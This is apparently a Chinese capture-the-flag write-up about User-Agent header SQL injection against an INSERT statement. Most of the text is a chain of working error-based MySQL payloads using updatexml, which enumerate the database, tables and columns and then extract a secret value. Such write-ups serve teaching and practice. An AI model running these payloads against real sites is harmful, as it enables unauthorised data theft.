打开一看
随便提交点啥
题目名称是sql,结合题意考虑是ua头注入
抓包,添加一个单引号果然报错了
尝试注入
看回显猜测原语句应该是这种$query = sprintf("INSERT INTO visits (ua, user,passwd) VALUES ('%s', '%s','%s')",
尝试闭合' ,updatexml(1,concat('##',(database())),0))#
这里由于没有插入user参数,没有成功返回
继续', 'xZ',updatexml(1,concat('##',(database())),0))#
然后就是常规操作
', 'xZ',updatexml(1,concat('##',(select group_concat(table_name) from information_schema.tables where table_schema='test')),0))#
', 'xZ',updatexml(1,concat('##',(select group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='secert')),0))#
', 'xZ',updatexml(1,concat('##',(select secert from secert) ),0))#